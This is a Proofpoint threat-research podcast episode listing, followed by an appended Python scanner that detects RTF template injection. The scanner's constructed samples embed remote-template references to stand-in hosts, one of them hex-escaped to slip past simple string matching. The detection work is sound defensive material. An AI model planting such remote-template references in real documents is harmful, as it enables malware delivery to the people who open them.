DISCARDED: Tales From the Threat Research Trenches

Proofpoint
Jun 7, 2022 • 30min

The Buzz on Bumblebee Malware

Float like a butterfly. Sting like Bumblebee malware.

In this episode, Kelsey Merriman, Threat Research Analyst, and Pim Trouerbach, Senior Reverse Engineer, both with Proofpoint, share insights from their research into the new malware downloader called Bumblebee. You won't want to miss their breakdown of Bumblebee's unique characteristics and their predictions of how its features will develop over time.

Join us as we discuss:
- The difference in tracking crimeware versus APT activity
- How threat actors are using Bumblebee
- The exit of BazaLoader malware and its connection to Bumblebee

Check out these resources we mentioned:
- https://www.proofpoint.com/us/blog/threat-insight/isnt-optimus-primes-bumblebee-its-still-transforming
- https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti

Keep up with the latest tales from the threat research trenches by subscribing to DISCARDED in Apple Podcasts, Spotify, or wherever you get podcasts. Thanks for listening!
May 24, 2022 • 32min

Social Engineering: How Threat Actors Manipulate Their Targets

Threat actors always take the path of least resistance to their payday. But it's a mistake to think they aren't willing to put in the work to get a human to hand-feed them.

Their attempts to manipulate targets into taking action are called social engineering. What role do people play in cybersecurity?

In this episode, Daniel Blackford, Threat Researcher at Proofpoint, explains how bad actors capitalize on our humanity to attack us.

Join us as we discuss:
- What lies beneath 95% of cyber attacks
- The two factors that reduce people's sensitivity to threats
- When social engineering content might be waiting for you

Check out these resources we mentioned:
- https://www.proofpoint.com/us/blog/threat-insight/operation-spoofedscholars-conversation-ta453
- https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media
- https://www.proofpoint.com/us/blog/threat-insight/triple-threat-north-korea-aligned-ta406-scams-spies-and-steal
- https://www.bankinfosecurity.com/kansas-man-faces-federal-charges-over-water-treatment-hack-a-16328
- https://twitter.com/selenalarson/status/1224674562882834432
May 10, 2022 • 39min

Paying Attention to BEC: The Most Costly Threat by Individual Losses

When you think about the most costly threat by individual losses, most people assume ransomware. The real leader, however, is business email compromise (BEC). So why aren't more companies talking about it?

In this episode, Tim Kromphardt and Jake G. explain BEC and why organizations need to start paying more attention.

Join us as we discuss:
- The definition of BEC and why companies pay it so little attention
- Using Supernova to defend against email attacks
- Reporting on employment fraud

Check out these resources we mentioned:
- BEC Taxonomy: https://www.proofpoint.com/us/blog/threat-insight/bec-taxonomy-proofpoint-framework
- Supernova: https://www.proofpoint.com/us/newsroom/press-releases/proofpoint-launches-industrys-first-cloud-native-information-protection-and
- IC3 Report: https://www.ic3.gov/
- TOAD blog post: https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery
- Railroad theft: https://www.cnn.com/2022/01/14/economy/la-freight-railroad-theft/index.html
Apr 26, 2022 • 36min

Web Bugs & the Tubthumping Tactics of Chinese Threat Actor TA416

Chinese threat actor TA416, also known as Mustang Panda, has been active for a long time, and every time they get knocked down, they get up again.

In this episode, Michael Raggi, Senior Threat Researcher, and Pim Trouerbach, Senior Reverse Engineer, both with Proofpoint, give us an overview of TA416, the "Tubthumping" villains of the threat landscape.

Join us as we discuss:
- The evolving tactics of TA416
- PlugX malware and control flow flattening
- Tips for dealing with emerging threats

Check out these resources we mentioned:
- Michael's Twitter: https://twitter.com/aRtAGGI/status/1501030779480125441
- https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european
- https://www.theregister.com/2022/03/09/china_apt41_mandiant_usaherds/
- Tubthumping by Chumbawamba
Apr 12, 2022 • 28min

Defending Against Cyber Criminals: Emotet’s Resurrection & Conti’s Implosion

Cybercriminals: they're just like us. With the Russia-Ukraine conflict, Conti found itself at odds with internal team members over the issue, eventually leading to self-destruction. Which raises the question: are these organizations as impenetrable as we thought?

In this episode, we hear from Andrew Northern, Senior Threat Researcher at Proofpoint, about the resurrection of the Emotet malware, the Conti implosion, and advice for cyber defenders.

Join us as we discuss:
- The journey leading to Emotet's return
- The importance of the Conti group leaks
- What defenders should be thinking about when facing these threats

Check out these resources we mentioned:
- Andrew's Twitter: https://mobile.twitter.com/ex_raritas
- https://acn-marketing-blog.accenture.com/wp-content/uploads/2022/03/UPDATED-ACTI-Global-Incident-Report-Ideological-Divide-Blog-14MARCH22.pdf
- https://www.wired.com/story/conti-ransomware-russia/
- https://www.cnn.com/2022/03/30/politics/ukraine-hack-russian-ransomware-gang/index.html
Mar 29, 2022 • 23min

Threat Actor 2541: The Latest Tricks & Patterns

How are threat actors like Olympic snowboard halfpipe athletes? When their good tricks get stolen by competitors, they add new ones to their repertoire.

In this episode, we hear from Joe Wise, Threat Researcher at Proofpoint, about the latest tricks from TA2541 (and why it's so fun to research that group).

Join us as we discuss:
- Changes that TA2541 has made over time
- Their current strategies and patterns
- Snowboarding, Home Alone, and what makes TA2541 unique

Check out this resource we mentioned:
- Charting TA2541's Flight | Proofpoint US
Mar 15, 2022 • 29min

The Troubling Rise of MFA Kits

Until recently, threat actors hadn't invested much time in MFA phish kits, because not many people used MFA. (Everyone needs MFA, full stop.) Now that adoption has grown, threat actors are fielding more advanced, MFA-capable phish kits.

Find out why in our first episode of DISCARDED, where we hear from Tim Kromphardt, Email Threat Researcher at Proofpoint, about why MFA kits are sort of like Justin Bieber ticket thieves.

Join us as we discuss:
- How MFA kits differ from ordinary phish kits
- What threat actors and researchers have in common
- A technical dive into transparent reverse proxies
- Why you need multifactor authentication despite the rise of MFA kits

Check out these resources we mentioned during the podcast:
- MFA PSA, Oh My!
- Catching Transparent Phish: Analyzing and Detecting MITM Phishing Toolkits
Mar 2, 2022 • 26min

Discussing RTF Template Injection: A Malicious Phishing Attempt

If you asked for M&M's and received Skittles, you might pop a few in your mouth, but it won't take long to realize something's off. This is what's happening with RTF files: recipients open what looks like an ordinary document attachment and only later realize the RTF was malicious.

On this episode of Protecting People, hosts Selena Larson and Crista Giering chat with Michael Raggi, Senior Threat Research Engineer at Proofpoint, about RTF files, template injection, and campaigns using the technique, in an effort to make sure customers aren't surprised with "Skittles."

Join us as we discuss:
- The importance of template injection
- Campaigns using the technique
- Widespread adoption of RTF template injection
- Mitigating and monitoring the technique

Resource mentioned:
- https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread

For more episodes like this one, subscribe to us on Apple Podcasts, Spotify, and the Proofpoint website, or just search for Protecting People in your favorite podcast player.
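The monitoring angle the episode points at, as an added example that is not from the page or from Proofpoint: a small Python scanner that pulls the \*\template destination out of an RTF file, decodes RTF's own \'hh and \uN escapes so that an encoded URL still surfaces, and flags any target that is a URL or UNC path, since that is what makes Word fetch a remote template when the document is opened. The sample documents, hostnames (example.invalid, fileshare.invalid) and file names below are constructed for illustration and are not indicators from any real campaign.

```python
"""Flag RTF documents whose \\*\\template destination points at a remote resource.

Added example for the RTF template injection episode; not Proofpoint's code.
The sample documents at the bottom are constructed for illustration.
"""
import re
from typing import List

# \*\template is the RTF destination that names the document template. A URL or
# UNC path here makes Word fetch the template over the network on open.
TEMPLATE_DEST = re.compile(rb"\\\*\\template(?![a-zA-Z])")
# Control word: backslash, letters, optional signed parameter, optional space delimiter.
CONTROL_WORD = re.compile(rb"\\([a-zA-Z]+)(-?\d+)? ?")
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "\\\\")


def _destination_body(data: bytes, start: int) -> bytes:
    """Bytes from `start` up to the brace that closes the enclosing RTF group."""
    depth, i = 0, start
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\" and data[i + 1:i + 2] in (b"\\", b"{", b"}"):
            i += 2  # escaped literal, not group structure
            continue
        if c == b"{":
            depth += 1
        elif c == b"}":
            if depth == 0:
                return data[start:i]
            depth -= 1
        i += 1
    return data[start:]


def decode_rtf_text(raw: bytes) -> str:
    """Reduce an RTF fragment to its literal text: resolve \\'hh and \\uN escapes, drop control words."""
    out = bytearray()
    i = 0
    while i < len(raw):
        c = raw[i:i + 1]
        if c != b"\\":
            if c not in (b"{", b"}", b"\r", b"\n"):
                out += c
            i += 1
            continue
        nxt = raw[i + 1:i + 2]
        if nxt in (b"\\", b"{", b"}"):            # \\ \{ \} are literal characters
            out += nxt
            i += 2
        elif nxt == b"'":                          # \'hh: one byte written as two hex digits
            try:
                out += bytes.fromhex(raw[i + 2:i + 4].decode("ascii"))
            except ValueError:
                pass
            i += 4
        else:
            m = CONTROL_WORD.match(raw, i)
            if m is None:                          # control symbol such as \~ or \-
                i += 2
            elif m.group(1) == b"u" and m.group(2):  # \uN: 16-bit signed code point
                n = int(m.group(2))
                out += chr(n + 0x10000 if n < 0 else n).encode("utf-8", "replace")
                i = m.end() + 1                    # also skip the one-byte ANSI fallback (\uc1 default)
            else:
                i = m.end()                        # any other control word carries no text
    return out.decode("utf-8", "replace")


def find_template_targets(rtf: bytes) -> List[str]:
    """Decoded text of every \\*\\template destination in the document."""
    targets = []
    for m in TEMPLATE_DEST.finditer(rtf):
        text = decode_rtf_text(_destination_body(rtf, m.end())).strip()
        if text:
            targets.append(text)
    return targets


def is_remote_template(target: str) -> bool:
    return target.lower().startswith(REMOTE_PREFIXES)


def scan(rtf: bytes) -> List[str]:
    """Template targets that would trigger a network fetch on open; empty for a clean file."""
    return [t for t in find_template_targets(rtf) if is_remote_template(t)]


def _hex_escape(s: str) -> bytes:
    """Encode text as RTF \\'hh escapes (used only to build a constructed sample)."""
    return b"".join(b"\\'%02x" % b for b in s.encode())


# Constructed samples (hostnames and file names are invented), not real campaign files.
BENIGN_RTF = rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Calibri;}}\f0\fs22 Quarterly report attached.\par}"
INJECTED_RTF = rb"{\rtf1\ansi{\*\template http://example.invalid/tpl.dotm}\f0 Please review.\par}"
UNC_RTF = rb"{\rtf1\ansi{\*\template \\\\fileshare.invalid\\tpl\\x.dotm}\par}"
ESCAPED_RTF = rb"{\rtf1\ansi{\*\template " + _hex_escape("https://example.invalid/t.rtf") + rb"}\par}"

if __name__ == "__main__":
    for name, doc in [("benign", BENIGN_RTF), ("plain URL", INJECTED_RTF),
                      ("UNC path", UNC_RTF), ("hex-escaped", ESCAPED_RTF)]:
        print(f"{name:12s} -> {scan(doc) or 'clean'}")
```

Matching on the literal string "http" inside the RTF is not enough, which is why the scanner decodes escapes first: the hex-escaped sample contains no readable URL bytes at all until the \'hh sequences are resolved. A local template path (for example a file under the user's profile) decodes the same way but is not flagged, so the check stays focused on the network fetch that template injection depends on.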
